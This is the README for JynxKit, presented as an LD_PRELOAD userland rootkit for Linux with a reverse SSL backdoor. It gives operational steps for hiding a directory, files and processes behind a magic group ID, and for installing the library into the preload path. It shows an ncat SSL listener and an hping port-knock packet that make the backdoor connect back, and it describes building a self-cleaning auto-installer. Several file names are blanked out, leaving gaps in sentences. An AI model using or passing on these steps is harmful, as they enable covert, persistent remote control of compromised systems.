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JynxKit is an LD_PRELOAD userland rootkit for Linux systems with reverse connection SSL backdoor

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		          ErrProne / XO
File list: bc.c config.h Makefile README

0x01. Setting up config.h.

	First of all, you need to dig into config.h, and ensure that the settings meet your needs.
MAGIC_DIR should be changed to the name of the directory you want to hide from the system. This can
be used as a prefix to your main directory as well as for files. MAGIC_GID will be the Group ID to
hide as well. Make sure that you set MAGIC_DIR Group ID to MAGIC_GID for hiding purposes as well.
This will help disguise the processes from the system, including commands like ps. CONFIG_FILE 
defaults to, which is usually located in /etc. You shouldn't have to change this 
unless you're going to dig a little deeper into hiding Jynx-Kit. MAGIC_ACK and MAGIC_SEQ are both 
used as the port knock sequence for back connect. The back connect program automatically sets GID 
to MAGIC_GID, so no need to worry about this. You'll initiate the back connect using a program like 
hping to manipulate the packets as needed.

# ncat --ssl -l -p 31337                                              # setup ssl listener

# hping localhost -s 31337 -M <MAGIC_SEQ> -L <MAGIC_ACK> -c 1         # make back connect phone home

0x02. Configuring Makefile and Installing.

	Once you have this configured, go ahead and open up Makefile. Make sure that MAGIC_GID 
matches what you have in config.h. INSTALL should be set to the directory that you want to hide
your files in. You can also set these variables upon calling "make install." See examples below.

# make all              # compile bc and

# make install		# Installs bc and ld_poison, injects into ld preload, and sets correct GIDs

# make install INSTALL=/omgxochi MAGIC_GID=100 

	The last line installs the kid to /omgxochi, and sets the GID to 100. You should use GID
of 100 for anything that you're going to run, and need to hide from the system.

	Now that you have everything configured and things compile correctly, you can use
in order to create an auto install shell script for future installations. Simply edit INSTALL_FILE
and FILES variables (if you added or removed any files that originally came with Jynx-Kit). By 
default, creates, which can be run on any system, it will extract the source
files, compile them, and install them to the defined hidden directory, then clean up all of the files.


JynxKit is an LD_PRELOAD userland rootkit for Linux systems with reverse connection SSL backdoor






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